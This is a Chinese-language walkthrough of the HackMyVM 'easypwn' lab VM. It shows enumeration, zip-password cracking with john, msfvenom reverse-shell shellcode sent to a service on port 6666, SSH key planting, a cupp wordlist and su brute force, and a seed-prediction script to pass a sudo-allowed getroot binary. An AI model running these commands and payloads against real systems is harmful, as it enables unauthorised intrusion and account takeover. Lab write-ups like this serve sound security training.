hack-my-vm-easypwn

端口扫描

kali@kali [~] ➜  sudo nmap -sT -p- --min-rate 1000 192.168.134.213                                                                               [17:25:47]
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-22 17:26 CST
Nmap scan report for 192.168.134.213
Host is up (0.0021s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
6666/tcp open  irc

服务渗透

靶机叫easypwn，估计6666是和pwn有关的吧，尝试连接看看

kali@kali [~] ➜  nc 192.168.134.213 6666                                                                                                         [17:26:11]
aaaa
Hackers, get out of my machine
[*] 等待客户端连接...

有的，我们想办法拿到源码吧

kali@kali [~] ➜  curl http://192.168.134.213         
</head>
<body>
    <h1>Don't Hack Me</h1>
    <p>Enumerating directories on my server would ruin everything</p>
</body>
</html>

让我们不要扫描？那也没思路了，扫

kali@kali [~] ➜  gobuster dir --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.134.213 -x txt,html,zip  [17:33:08]
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.134.213
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,html,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 930]
/.html                (Status: 403) [Size: 280]
/.html                (Status: 403) [Size: 280]
/mysecret.txt         (Status: 200) [Size: 383]

kali@kali [~] ➜  curl http://192.168.134.213/mysecret.txt                                                                                        [17:35:46]
Go to the most evil port.
You will get what you want.
Please be gentle with him, maybe he will be afraid.
In order to obtain its source code.
Perhaps you will need the dictionary below.


去那个最邪恶的端口。
你会得到你想要的。
请对他温柔一点，也许它会害怕。
为了得到它的源码。
也许你会需要下面的字典。




/YTlPX4d2UENbWnI.txt

拿到一个字典

kali@kali [~] ➜  curl http://192.168.134.213/YTlPX4d2UENbWnI.txt > dict                                                                          [17:35:51]
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    68  100    68    0     0   3761      0 --:--:-- --:--:-- --:--:--  3777
kali@kali [~] ➜  cat dict                                                                                                                        [17:36:48]
ta0
lingmj
bamuwe
todd
ll104567
primary
lvzhouhang
qiaojojo
flower

继续扫呗

kali@kali [~] ➜  gobuster dir --wordlist=/home/kali/dict  -u http://192.168.134.213                                                              [17:36:52]
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.134.213
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/kali/dict
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 10 / 11 (90.91%)
/ll104567             (Status: 200) [Size: 739584]
===============================================================
Finished
===============================================================

curl发现是文件，我们wget下载

kali@kali [~] ➜  curl http://192.168.134.213/ll104567                                                                                            [17:37:41]
Warning: Binary output can mess up your terminal. Use "--output -" to tell 
Warning: curl to output it to your terminal anyway, or consider "--output 
Warning: <FILE>" to save to a file.
kali@kali [~] ➜  wget http://192.168.134.213/ll104567                                                                                            [17:38:02]
--2025-04-22 17:38:44--  http://192.168.134.213/ll104567
正在连接 192.168.134.213:80... 已连接。
已发出 HTTP 请求，正在等待回应... 200 OK
长度：739584 (722K)
正在保存至: “ll104567”

ll104567                               100%[============================================================================>] 722.25K  --.-KB/s  用时 0.03s   

2025-04-22 17:38:44 (22.6 MB/s) - 已保存 “ll104567” [739584/739584])
kali@kali [~] ➜  file ll104567                                                                                                                   [17:38:48]
ll104567: Zip archive data, at least v2.0 to extract, compression method=deflate

压缩包，里面估计就是源代码了

kali@kali [~] ➜  unzip ll104567                                                                                                                  [17:40:06]
Archive:  ll104567
[ll104567] opt/server password: 

要密码，我用给的字典跑了一下，没成功，直接爆破吧

kali@kali [~/Desktop] ➜  zip2john ll104567 > hash                                                                                            [17:41:13]
ver 2.0 efh 5455 efh 7875 ll104567.zip/opt/server PKZIP Encr: TS_chk, cmplen=739398, decmplen=2120576, crc=1B8B19DF ts=4118 cs=4118 type=8

kali@kali [~/Desktop] ➜  john --show hash                                                                                                        [17:41:46]

ll104567.zip/opt/server:oooooo:opt/server:ll104567.zip::ll104567.zip

1 password hash cracked, 0 left

我破解过了，直接john hash破解就可以了，解压之后直接拖到IDA就行了

只要不存在限制字符，就能执行我们写入的代码，我们看看过滤了啥，好像就4个字节吧，0x20，0x0f，0xcd，0x22，0x9，0x00，0xa也不多

直接生成一个反弹shell的二进制文件

kali@kali [~] ➜  msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.134.141 LPORT=8888 -b '\x00\x20\x0f\xcd\x0a\x0f\x22\x09' -f raw > binary 
kali@kali [~] ➜  cat binary | nc 192.168.134.213 6666 

反弹shell，然后我写了一个公钥进去

wget http://192.168.134.141:8000/id_rsa.pub
--2025-04-22 06:20:33--  http://192.168.134.141:8000/id_rsa.pub
Connecting to 192.168.134.141:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 748 [application/vnd.exstream-package]
Saving to: 'id_rsa.pub'

     0K                                                       100% 83.6M=0s

2025-04-22 06:20:33 (83.6 MB/s) - 'id_rsa.pub' saved [748/748]

ls
id_rsa.pub
mv id_rsa.pub authorized_keys
ls
authorized_keys
id
uid=1001(lamb) gid=1001(lamb) groups=1001(lamb)

kali@kali [~/.ssh] ➜  ssh lamb@192.168.134.213                                                                                                   [18:21:23]
The authenticity of host '192.168.134.213 (192.168.134.213)' can't be established.
ED25519 key fingerprint is SHA256:rXcjV9xeZG+J6KZLTr1t2Xi2ErBvMauXjxH4EBvhV0c.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.134.213' (ED25519) to the list of known hosts.
Linux pwnding 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Feb 20 03:24:48 2025 from 192.168.1.32
lamb@pwnding:~$ cat use3e3e3e3e3sr.txt 
flag{3a463d08f2ae11efbeb6000c29094b2d}

提权

lamb@pwnding:~$ cat this_is_a_tips.txt 
There is a fun tool called cupp.
I heard it's a good social engineering dictionary generator.
Are there really people that stupid these days? haha.
There is only one way to become ROOT, which is to execute getroot!!!
And don't forget, this is a PWN type machine.

有一个很好玩的工具叫做 cupp.
听说那是一个不错的社会工程学字典生成器.
现在真的还会有人这么蠢吗？haha.
成为 ROOT 的方法只有一条，就是执行 getroot !!!
而且你不要忘记了，这是一个pwn类型的机器.

要执行getroot，那估计还是二进制程序呗

lamb@pwnding:~$ which getroot
/usr/local/bin/getroot
lamb@pwnding:~$ ls -la /usr/local/bin/getroot
-rwxr-xr-x 1 root root 18912 Feb 20 02:19 /usr/local/bin/getroot
lamb@pwnding:~$ cp /usr/local/bin/getroot .
lamb@pwnding:~$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.134.141 - - [22/Apr/2025 06:31:51] "GET /getroot HTTP/1.1" 200 -

我们拿过来看看

代码看不懂也行，随机数使用时间做的种子，得确保同时运行getroot和我们下面给的脚本

直接拿AI跑就行，其实就是模拟getroot的加密，来预测这个数字，因为c程序伪随机的特性，所以得保证种子一致

#include <iostream>
#include <cstdlib>
#include <ctime>
#include <cmath>
#include <algorithm>

#define M_PI 3.14159265358979323846

int main() {
    // 使用当前时间作为随机种子
    std::time_t seed = std::time(nullptr);
    std::srand(seed);

    // 生成v20
    int v20 = std::rand() % 86400;

    // 生成正态分布所需的两个随机数
    int rand1 = std::rand();
    int rand2 = std::rand();
    double u1 = static_cast<double>(rand1) / 2147483647.0;
    double u2 = static_cast<double>(rand2) / 2147483647.0;

    // Box-Muller转换生成正态分布值
    double magnitude = std::sqrt(-2.0 * std::log(u1));
    double normal = magnitude * std::cos(2 * M_PI * u2);

    // 计算v15并约束范围
    int v15 = static_cast<int>(5.0 * normal + v20);
    v15 = std::max(0, std::min(v15, 86399));

    // 输出预测的magic number
    std::cout <<  v15 + 12345 << std::endl;

    return 0;
}

问题是，我们现在运行不了，我们不是root用户，运行了也读不出来，sudo -l 要密码，估计sudo -l 里面有东西

╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rw-r--r-- 1 root root 4 Apr 22 06:19 /tmp/server_monitor.lock
-rw-r--r-- 1 root root 51200 Apr 22 06:25 /var/backups/alternatives.tar.0
-rw-r--r-- 1 root root 1936 Feb 24 07:59 /var/backups/.secret/.verysecret/.noooooo/note2.txt

linpeas跑出来一个txt文件

lamb@pwnding:~$ cat /var/backups/.secret/.verysecret/.noooooo/note2.txt
The Compass and the Campfire

David knelt beside his ten-year-old son, Jake, their shared backpack spilling onto the forest floor. "Lost?" Jake whispered, staring at the identical trees clawing at the twilight. David’s calloused fingers brushed the cracked compass in his palm—a relic from his father, its needle trembling like a moth. "Not lost," he lied. "Just… rerouting."

Jake’s eyes narrowed, too sharp for comfort. "Your compass is broken."

A chuckle escaped David, brittle as dry leaves. "Compasses don’t break, bud. They… forget." He flipped it open, the glass fogged with age. "See? North isn’t where it should be. It’s where it chooses to be tonight."

The boy frowned, then yelped as a pinecone thudded beside him. A red squirrel chattered overhead, its tail flicking like a metronome. Jake’s fear dissolved into giggles. David watched, throat tight. He’s still young enough to laugh at squirrels.

"Dad?" Jake unzipped his jacket, revealing three granola bars and a glowstick. "We’ve got supplies. Let’s build a fort."

They wove branches into a crooked shelter, Jake’s hands steady where David’s shook. When the first stars pierced the canopy, David confessed: "Grandpa gave me this compass the day I got lost in the mall. Told me it’d always point home."

Jake snapped the glowstick, bathing their fort in alien green. "Does it work now?"

The needle quivered, settling northwest. Toward the distant highway hum, not their cabin’s woodsmoke. David closed the brass lid. "Nope. But you do." He nodded at Jake’s pocket—where a crumpled trail map peeked out, dotted with the boy’s doodled dinosaurs.

Dawn found them at the cabin’s porch, guided by Jake’s roars laughter and the squirrels he’d named "Sir Nibbles". The compass stayed in David’s pocket, its secret safe: true north had shifted years ago, anyway—from steel poles to a gap-toothed grin eating pancakes at 6 AM.

一篇作文，结合前面给的cupp，估计是让我们做社工字典，来搞出密码

kali@kali [~/web_shell_toos/cupp] git:(master) ➜  python3 cupp.py -i                                                                             [20:08:29]
 ___________ 
   cupp.py!                 # Common
      \                     # User
       \   ,__,             # Passwords
        \  (oo)____         # Profiler
           (__)    )\   
              ||--|| *      [ Muris Kurgas | j0rgan@remote-exploit.org ]
                            [ Mebus | https://github.com/Mebus/]


[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)

> First Name: David
> Surname: 
> Nickname: 
> Birthdate (DDMMYYYY): 


> Partners) name: 
> Partners) nickname: 
> Partners) birthdate (DDMMYYYY): 


> Child's name: Jake
> Child's nickname: 
> Child's birthdate (DDMMYYYY): 


> Pet's name: 
> Company name: 


> Do you want to add some key words about the victim? Y/[N]: 
> Do you want to add special chars at the end of words? Y/[N]: 
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]: 

[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to david.txt, counting 500 words.
> Hyperspeed Print? (Y/n) : 
[+] Now load your pistolero with david.txt and shoot! Good luck!

lamb@pwnding:~$ wget http://192.168.134.141:8000/suForce
--2025-04-22 08:17:20--  http://192.168.134.141:8000/suForce
Connecting to 192.168.134.141:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2430 (2.4K) [application/octet-stream]
Saving to: ‘suForce’

suForce                                100%[============================================================================>]   2.37K  --.-KB/s    in 0s      

2025-04-22 08:17:20 (38.0 MB/s) - ‘suForce’ saved [2430/2430]

lamb@pwnding:~$ chmod +x suForce 
lamb@pwnding:~$ wget http://192.168.134.141:8000/cupp/david.txt
--2025-04-22 08:18:12--  http://192.168.134.141:8000/cupp/david.txt
Connecting to 192.168.134.141:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4987 (4.9K) [text/plain]
Saving to: ‘david.txt’

david.txt                              100%[============================================================================>]   4.87K  --.-KB/s    in 0s      

2025-04-22 08:18:12 (112 MB/s) - ‘david.txt’ saved [4987/4987]
lamb@pwnding:~$ ./suForce -u lamb -w david.txt 
            _____                          
 ___ _   _ |  ___|__  _ __ ___ ___   
/ __| | | || |_ / _ \| '__/ __/ _ \ 
\__ \ |_| ||  _| (_) | | | (_|  __/  
|___/\__,_||_|  \___/|_|  \___\___|  
───────────────────────────────────
 code: d4t4s3c     version: v1.0.0
───────────────────────────────────
🎯 Username | lamb
📖 Wordlist | david.txt
🔎 Status   | 372/499/74%/ekaJ_2016
💥 Password | ekaJ_2016
───────────────────────────────────

拿到密码，执行sudo -l

lamb@pwnding:~$ sudo -l
[sudo] password for lamb: 
Matching Defaults entries for lamb on pwnding:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lamb may run the following commands on pwnding:
    (ALL : ALL) PASSWD: /usr/local/bin/getroot
lamb@pwnding:~$ 

确实有getroot的sudo权限，我们结合前面AI的脚本执行看看

lamb@pwnding:~$ g++ -o b a.cpp
lamb@pwnding:~$ sudo /usr/local/bin/getroot $(./b)
$1$BvrTqWyB$Soa7qkeu1GfIoy2duf53t0

拿到了一个hash，这个就是密码，我还进行破解了，破解出来的不是密码，完结